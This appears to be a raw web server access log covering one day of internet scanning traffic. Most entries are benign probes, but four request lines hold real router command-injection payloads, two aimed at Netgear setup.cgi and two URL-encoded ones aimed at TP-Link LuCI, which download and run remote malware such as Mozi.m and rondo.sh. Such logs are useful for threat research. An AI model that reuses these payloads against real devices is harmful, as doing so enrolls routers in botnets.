139.5.11.172 - - [02/Jul/2025:00:27:57 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 45.131.155.254 - - [02/Jul/2025:00:35:47 +0200] "-" 400 1930 45.131.155.254 - - [02/Jul/2025:00:35:58 +0200] "-" 400 1930 45.131.155.254 - - [02/Jul/2025:00:36:38 +0200] "-" 400 1930 45.131.155.254 - - [02/Jul/2025:00:36:39 +0200] "GET / HTTP/1.1" 200 1895 103.186.101.248 - - [02/Jul/2025:00:42:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.82.78.254 - - [02/Jul/2025:00:54:16 +0200] "GET /favicon.ico HTTP/1.1" 404 729 104.236.209.11 - - [02/Jul/2025:00:55:51 +0200] "GET / HTTP/1.1" 200 1895 172.104.11.4 - - [02/Jul/2025:01:37:25 +0200] "GET / HTTP/1.1" 200 1895 185.218.84.40 - - [02/Jul/2025:02:11:11 +0200] "GET / HTTP/1.1" 200 1895 204.76.203.206 - - [02/Jul/2025:02:12:33 +0200] "GET / HTTP/1.1" 200 1895 47.237.168.159 - - [02/Jul/2025:03:14:09 +0200] "GET / HTTP/1.1" 200 1895 47.237.168.159 - - [02/Jul/2025:03:14:10 +0200] "GET /favicon.ico HTTP/1.1" 404 729 34.52.146.253 - - [02/Jul/2025:03:15:33 +0200] "-" 400 1930 34.52.146.253 - - [02/Jul/2025:03:15:35 +0200] "GET / HTTP/1.1" 200 1895 185.218.84.47 - - [02/Jul/2025:03:17:38 +0200] "GET / HTTP/1.1" 200 1895 167.99.185.162 - - [02/Jul/2025:03:24:16 +0200] "-" 400 1930 167.99.185.162 - - [02/Jul/2025:03:24:16 +0200] "-" 400 1930 167.99.185.162 - - [02/Jul/2025:03:24:16 +0200] "-" 400 1930 167.99.185.162 - - [02/Jul/2025:03:24:16 +0200] "-" 400 1930 167.99.185.162 - - [02/Jul/2025:03:24:17 +0200] "GET /get.php HTTP/1.1" 404 725 64.62.156.52 - - [02/Jul/2025:03:32:18 +0200] "-" 400 1930 176.65.148.183 - - [02/Jul/2025:03:34:09 +0200] "GET /.env HTTP/1.1" 404 722 103.152.164.171 - - [02/Jul/2025:03:48:39 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 188.124.16.171 - - [02/Jul/2025:04:02:01 +0200] "GET / HTTP/1.1" 200 1895 80.251.153.117 - - [02/Jul/2025:04:23:44 +0200] "GET / HTTP/1.1" 200 1895 182.42.150.27 - - [02/Jul/2025:04:55:36 +0200] "GET /containers/json HTTP/1.1" 404 737 185.218.84.45 - - [02/Jul/2025:05:10:45 +0200] "GET / HTTP/1.1" 200 1895 103.186.101.248 - - [02/Jul/2025:05:33:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 204.76.203.206 - - [02/Jul/2025:05:36:28 +0200] "GET / HTTP/1.1" 200 1895 185.218.84.47 - - [02/Jul/2025:06:15:18 +0200] "GET / HTTP/1.1" 200 1895 185.169.4.150 - - [02/Jul/2025:06:23:18 +0200] "GET / HTTP/1.1" 200 1895 196.251.89.45 - - [02/Jul/2025:06:32:03 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 196.251.89.45 - - [02/Jul/2025:06:32:03 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 185.169.4.150 - - [02/Jul/2025:07:56:16 +0200] "GET /cgi-bin/diagnostics.cgi HTTP/1.1" 404 745 196.251.89.45 - - [02/Jul/2025:08:00:57 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 34.224.58.138 - - [02/Jul/2025:08:19:52 +0200] "GET / HTTP/1.1" 200 1895 103.186.101.248 - - [02/Jul/2025:08:29:26 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 205.210.31.48 - - [02/Jul/2025:08:33:05 +0200] "-" 400 1930 205.210.31.48 - - [02/Jul/2025:08:33:05 +0200] "-" 400 1930 185.218.84.46 - - [02/Jul/2025:09:27:15 +0200] "GET / HTTP/1.1" 200 1895 204.76.203.206 - - [02/Jul/2025:09:36:04 +0200] "GET / HTTP/1.1" 200 1895 87.121.84.208 - - [02/Jul/2025:09:42:12 +0200] "POST /api/sys/login HTTP/1.1" 404 739 87.121.84.208 - - [02/Jul/2025:09:42:12 +0200] "POST /bf/tracert HTTP/1.1" 404 732 104.234.115.45 - - [02/Jul/2025:09:49:13 +0200] "GET / HTTP/1.0" 200 1895 104.234.115.45 - - [02/Jul/2025:09:49:22 +0200] "-" 400 1930 104.234.115.45 - - [02/Jul/2025:09:49:42 +0200] "GET / HTTP/1.1" 200 1895 104.234.115.45 - - [02/Jul/2025:09:52:44 +0200] "-" 400 1930 104.234.115.45 - - [02/Jul/2025:09:52:50 +0200] "GET /favicon.ico HTTP/1.1" 404 729 184.105.139.68 - - [02/Jul/2025:10:00:53 +0200] "GET / HTTP/1.1" 200 1895 184.105.139.88 - - [02/Jul/2025:10:01:30 +0200] "GET /favicon.ico HTTP/1.1" 404 729 184.105.139.96 - - [02/Jul/2025:10:01:40 +0200] "GET /?format=json HTTP/1.1" 200 1895 184.105.139.76 - - [02/Jul/2025:10:01:45 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 184.105.139.68 - - [02/Jul/2025:10:01:50 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 198.235.24.56 - - [02/Jul/2025:10:05:52 +0200] "GET / HTTP/1.1" 200 1895 103.26.221.125 - - [02/Jul/2025:10:23:20 +0200] "GET / HTTP/1.0" 200 1895 185.169.4.150 - - [02/Jul/2025:10:57:09 +0200] "GET /cgi-bin/diagnostics.cgi HTTP/1.1" 404 745 66.63.187.21 - - [02/Jul/2025:11:07:32 +0200] "-" 400 1930 80.251.153.117 - - [02/Jul/2025:11:26:54 +0200] "GET / HTTP/1.1" 200 1895 45.131.155.253 - - [02/Jul/2025:11:46:51 +0200] "GET / HTTP/1.1" 200 1895 45.131.155.252 - - [02/Jul/2025:11:46:53 +0200] "-" 400 1930 45.131.155.253 - - [02/Jul/2025:11:46:54 +0200] "-" 400 1930 45.131.155.252 - - [02/Jul/2025:11:46:54 +0200] "-" 400 1930 185.156.73.154 - - [02/Jul/2025:12:07:52 +0200] "-" 400 1930 52.188.227.37 - - [02/Jul/2025:12:19:51 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.201 - - [02/Jul/2025:13:06:26 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.201 - - [02/Jul/2025:13:06:39 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.201 - - [02/Jul/2025:13:06:42 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.94.138.201 - - [02/Jul/2025:13:06:57 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.94.138.201 - - [02/Jul/2025:13:07:11 +0200] "-" 400 1930 167.94.138.201 - - [02/Jul/2025:13:07:13 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 746 204.76.203.206 - - [02/Jul/2025:13:30:35 +0200] "GET / HTTP/1.1" 200 1895 207.167.67.206 - - [02/Jul/2025:14:51:36 +0200] "GET / HTTP/1.1" 200 1895 207.167.67.206 - - [02/Jul/2025:14:51:36 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 207.167.67.206 - - [02/Jul/2025:14:51:37 +0200] "GET / HTTP/1.1" 200 1895 207.167.67.206 - - [02/Jul/2025:14:51:38 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.156.73.154 - - [02/Jul/2025:14:57:30 +0200] "-" 400 1930 47.237.79.10 - - [02/Jul/2025:15:05:14 +0200] "GET / HTTP/1.1" 200 1895 123.160.223.73 - - [02/Jul/2025:15:05:56 +0200] "GET / HTTP/1.1" 200 1895 123.160.223.73 - - [02/Jul/2025:15:05:57 +0200] "GET /favicon.ico HTTP/1.1" 404 729 44.220.185.84 - - [02/Jul/2025:15:18:50 +0200] "GET / HTTP/1.1" 200 1895 59.89.71.217 - - [02/Jul/2025:15:27:42 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.89.71.217:35939/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 103.186.101.248 - - [02/Jul/2025:16:17:19 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 135.237.126.228 - - [02/Jul/2025:16:26:03 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:15:22 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:15:25 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:15:37 +0200] "CONNECT 196.251.69.116:80 HTTP/1.0" 400 804 196.251.69.116 - - [02/Jul/2025:17:15:41 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:15:43 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:15:45 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:15:47 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:15:58 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:16:04 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:16:07 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:16:18 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:16:25 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:16:27 +0200] "-" 400 1930 196.251.69.116 - - [02/Jul/2025:17:16:31 +0200] "-" 400 1930 103.186.101.248 - - [02/Jul/2025:17:47:06 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 150.107.38.251 - - [02/Jul/2025:17:50:00 +0200] "-" 400 1930 150.107.38.251 - - [02/Jul/2025:17:50:01 +0200] "GET / HTTP/1.1" 200 1895 150.107.38.251 - - [02/Jul/2025:17:50:01 +0200] "-" 400 1930 150.107.38.251 - - [02/Jul/2025:17:50:02 +0200] "-" 400 1930 150.107.38.251 - - [02/Jul/2025:17:50:02 +0200] "-" 400 1930 150.107.38.251 - - [02/Jul/2025:17:50:05 +0200] "-" 400 1930 150.107.38.251 - - [02/Jul/2025:17:50:07 +0200] "-" 400 1930 150.107.38.251 - - [02/Jul/2025:17:50:07 +0200] "-" 400 1930 87.121.84.34 - - [02/Jul/2025:19:20:48 +0200] "GET null HTTP/1.1" 400 1994 87.121.84.34 - - [02/Jul/2025:19:20:49 +0200] "GET null HTTP/1.1" 400 1994 204.76.203.206 - - [02/Jul/2025:19:22:35 +0200] "GET / HTTP/1.1" 200 1895 146.190.87.11 - - [02/Jul/2025:19:39:12 +0200] "GET / HTTP/1.1" 200 1895 185.218.84.47 - - [02/Jul/2025:19:45:21 +0200] "GET / HTTP/1.1" 200 1895 45.142.193.91 - - [02/Jul/2025:19:52:58 +0200] "-" 400 1930 207.154.195.196 - - [02/Jul/2025:19:55:29 +0200] "GET /get.php HTTP/1.1" 404 725 207.154.195.196 - - [02/Jul/2025:19:55:29 +0200] "-" 400 1930 207.154.195.196 - - [02/Jul/2025:19:55:29 +0200] "-" 400 1930 207.154.195.196 - - [02/Jul/2025:19:55:29 +0200] "-" 400 1930 207.154.195.196 - - [02/Jul/2025:19:55:29 +0200] "-" 400 1930 103.152.164.171 - - [02/Jul/2025:20:05:10 +0200] "CONNECT ipinfo.io:443 HTTP/1.1" 400 804 146.190.119.189 - - [02/Jul/2025:20:11:37 +0200] "GET /aaa9 HTTP/1.1" 404 722 146.190.119.189 - - [02/Jul/2025:20:11:40 +0200] "GET /aab8 HTTP/1.1" 404 722 146.190.119.189 - - [02/Jul/2025:20:11:42 +0200] "GET / HTTP/1.1" 200 1895 185.169.4.150 - - [02/Jul/2025:20:52:49 +0200] "GET / HTTP/1.1" 200 1895 205.210.31.177 - - [02/Jul/2025:21:29:40 +0200] "-" 400 1930 205.210.31.177 - - [02/Jul/2025:21:29:40 +0200] "-" 400 1930 3.17.207.60 - - [02/Jul/2025:21:40:05 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 147.185.132.114 - - [02/Jul/2025:22:21:36 +0200] "GET / HTTP/1.0" 200 1895 45.131.155.253 - - [02/Jul/2025:22:22:24 +0200] "-" 400 1930 45.131.155.253 - - [02/Jul/2025:22:22:35 +0200] "-" 400 1930 45.131.155.253 - - [02/Jul/2025:22:23:28 +0200] "-" 400 1930 45.131.155.253 - - [02/Jul/2025:22:23:32 +0200] "GET / HTTP/1.1" 200 1895 185.170.144.3 - - [02/Jul/2025:22:34:41 +0200] "-" 400 1930 103.186.101.248 - - [02/Jul/2025:22:52:08 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.135.194.11 - - [02/Jul/2025:23:02:46 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F45.8.145.203%2Frondo.sh%29%20%7C%20sh%20-s%20tplink.8080%3B%29 HTTP/1.1" 404 756 104.236.209.11 - - [02/Jul/2025:23:05:43 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.172 - - [02/Jul/2025:23:09:56 +0200] "GET / HTTP/1.1" 200 1895 204.76.203.206 - - [02/Jul/2025:23:53:49 +0200] "GET / HTTP/1.1" 200 1895 45.135.194.11 - - [02/Jul/2025:23:56:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F45.8.145.203%2Frondo.sh%29%20%7C%20sh%20-s%20tplink.8080%3B%29 HTTP/1.1" 404 756